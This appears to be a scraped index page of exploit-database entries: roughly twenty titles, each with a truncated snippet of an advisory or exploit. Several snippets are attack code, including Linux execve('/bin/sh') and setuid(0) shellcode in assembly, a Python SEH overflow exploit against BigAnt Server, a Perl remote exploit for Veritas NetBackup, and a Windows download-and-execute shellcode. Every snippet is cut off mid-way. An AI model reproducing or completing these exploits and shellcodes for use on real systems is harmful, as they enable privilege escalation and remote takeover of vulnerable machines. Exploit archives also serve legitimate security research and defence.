IWConfig Local ARGV Command Line Buffer Overflow Vulnerability (1)

No description provided by source. source: http://www.securityfocus.com/bid/8901/info A problem has been identified in the iwconfig program when handling strings on the commandline. Because of this, a local attacker may be able to gain elevated privileges. Exploit: / PSTiwconfig /sbin/iwconfig...

NVR SP2 2.0 (nvUnifiedControl.dll 1.1.45.0) - SetText() Remote Exploit

No description provided by source. ------------------------------------------------------------------------------------------ PoC2 NVR SP2 2.0 nvUnifiedControl.AUnifiedControl.1 nvUnifiedControl.dll v. 1.1.45.0 SetText Remote BoF Heap Spray Technique url: http://www.acti.com/index.asp author:...

FreeBSD 2.2-4.2,NetBSD 1.2-4.5,OpenBSD 2.x ftpd glob() Buffer Overflow

No description provided by source. source: http://www.securityfocus.com/bid/2548/info The BSD ftp daemon and derivatives such as IRIX ftpd or the ftp daemon shipped with Kerberos 5 contain a number of buffer overflows that may lead to a compromise of root access to malicious users. During parsing...

Linux/x86_64 execve("/bin/sh"); 30 bytes shellcode

No description provided by source. Linux/x8664 execve/bin/sh; 30 bytes shellcode Date: 2010-04-26 Author: zbt Tested on: x8664 Debian GNU/Linux / ; execve/bin/sh, /bin/sh, NULL section .text global start start: xor rdx, rdx mov qword rbx, '//bin/sh' shr rbx, 0x8 push rbx mov rdi, rsp push rax pus...

linux/x86 setuid(0) & execve(/bin/sh,0,0) shellcode 28 bytes

No description provided by source. -------------------ASM---------------------- global start section .text start: ;setuid0 xor ebx,ebx lea eax,ebx+17h cdq int 80h ;execve/bin/sh,0,0 xor ecx,ecx push ecx push 0x68732f6e push 0x69622f2f lea eax,ecx+0Bh mov ebx,esp int 80h...

IMLib2 Home Environment Variable Buffer Overflow Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/3868/info Imlib2 is a freely available, open source graphics library available for the Linux and Unix operating systems. It is maintained by Michael Jennings. Imlib2 is installed on many operating systems and linked with...

Alt-N WebAdmin 2.0.x USER Parameter Buffer Overflow Vulnerability (2)

No description provided by source. source: http://www.securityfocus.com/bid/8024/info Alt-N WebAdmin is prone to a buffer overflow condition. This is due to insufficient bounds checking on the USER parameter. Successful exploitation could result in code execution with SYSTEM level privileges. /...

Upclient 5.0 b7 Command Line Argument Buffer Overflow Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/7703/info upclient has been reported prone to a buffer overflow vulnerability when handling command line arguments of excessive length. It is possible for a local attacker to seize control of the vulnerable application an...

BigAnt Server 2.50 - GET Request Remote BOF Exploit (SEH) Universal

No description provided by source. !/usr/bin/python by hack4love BigAnt Server version 2.50 SEH Overwrite Universal discovered by Blake http://www.milw0rm.com/exploits/9673 Tested on Windows XP SP2 gratez to Blake use bigant.py 192.168.1.12 6660 import socket, sys if lensys.argv!= 3: print \n...

Xmame <= 0.102 (-pb/-lang/-rec) Local Buffer Overflow Exploit

No description provided by source. / xmame-expl.c by sj [email protected] On 20th of Jan it came to my attention that Xmame suffered from several buffer overflow problems. Thinking this issue was resolved, I installed Xmame on my Ubuntu laptop, from the Ubuntu repositories which installed a vulnerable...

Prozilla 1.3.6 - Remote Stack Overflow Exploit

No description provided by source. / 20/10/2004 This is a private work of Serkan Akpolat [email protected] for the unpublished prozilla-1.3.6 format string/buffer overflow vulnerability , though this version only exploits the stack overflow. Tested against current gentoo/slack/debian/suse wi...

Elm Development Group ELM 2.4/2.5.1 Mail for UNIX (ELM) Buffer Overflow (2)

No description provided by source. source: http://www.securityfocus.com/bid/1276/info Buffer overflow vulnerabilities exist in elm Electronic Mail for Unix. / Elm 2.5 PL3 exploit Tested Under Linux Slackware 3.6, 4.0, 7.0 By xfer [email protected] Of Buffer0verfl0w Security At Sat May 27...

VirtualDJ Pro/Home <= 7.3 - Buffer Overflow Vulnerability

No description provided by source. def encodeDatadecoder, data, validValues: assert data.find"\0" == -1, "Shellcode must be NULL free" data += "\0" End of shellcode encData = decoder-2: decoder = decoder:-2 for p in rangelendata: dByte = orddatap pxByte = ordencDatap+1 bx, by = encoderdByte ^...

Mac OS X <= 10.3.7 mRouter Local Privilege Escalation Exploit

No description provided by source. / fm-iSink.c overflow in mRouter, suid binary used by iSync, on OSX = 10.3.7 written by - nemo @ felinemenace.org - ,'| .-''-.....--'; / '. ..-' , ,--...--''' \ .--''' /' -';' ; ; ; ...--'' ...--..' .;.' fL ,....----''' ,..--'' http://pulltheplug.org and...

EZMeeting 3.x EZNet.EXE Long HTTP Request Remote Buffer Overflow Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/9167/info A problem has been identified in the handling of some types of requests by the eZ package, resulting in a buffer overrun. Because of this, it may be possible for a remote attacker to execute arbitrary code and...

Adobe Flash Player < 10.1.53 .64 Action Script Type Confusion Exploit (DEP+ASLR bypass)

No description provided by source. Source: http://www.abysssec.com/blog/2011/04/exploiting-adobe-flash-player-on-windows-7/ Adobe Flash player Action script type confusion exploit DEP+ASLR bypass advisory text : Here is another reliable windows 7 exploit . the main method used for exploitation is...

rsync <= 2.5.7 - Local stack overflow Root Exploit

No description provided by source. / rsync = 2.5.7 Local Exploit Saved EIP on stack is overwritten with address of shellcode in memory Generally rsync is not setuid or setgid so just a local shell is of no use So i used a portbinding shellcode as a PoC of a different attack vector. RET is...

Linux/x86 Multi-Egghunter

No description provided by source. / Title: Multi-Egghunter Author: Ryan Fenno @ryanfenno Date: 20 September 2013 Tested on: Linux/x86 Ubuntu 12.0.3 Description: This entry represents an extension of skape's sigaction2 egghunting method 1 to multiple eggs. It is similar in spirit to BJ 'SkyLined'...

Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode

No description provided by source. / Title: Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode Date: 2013-22-01 Author: RubberDuck Web: http://bflow.security-portal.cz http://www.security-portal.cz Tested on: Win 2k, Win XP Home SP2/SP3 CZ 32, Win 7 32/64 -- file is downloaded from URL...

Veritas NetBackup <= 6.0 (bpjava-msvc) Remote Exploit (OS X)

No description provided by source. !/usr/bin/perl VERITAS-OSX.pl - VERITAS NetBackup Format Strings OSX/ppc Remote Exploit johnhatdigitalmunitiondotcom bug found by kflistsatdigitalmunitiondotcom http://www.digitalmunition.com/ use POSIX; use IO::Socket; use IO::Select; my $shellcode = / OSX...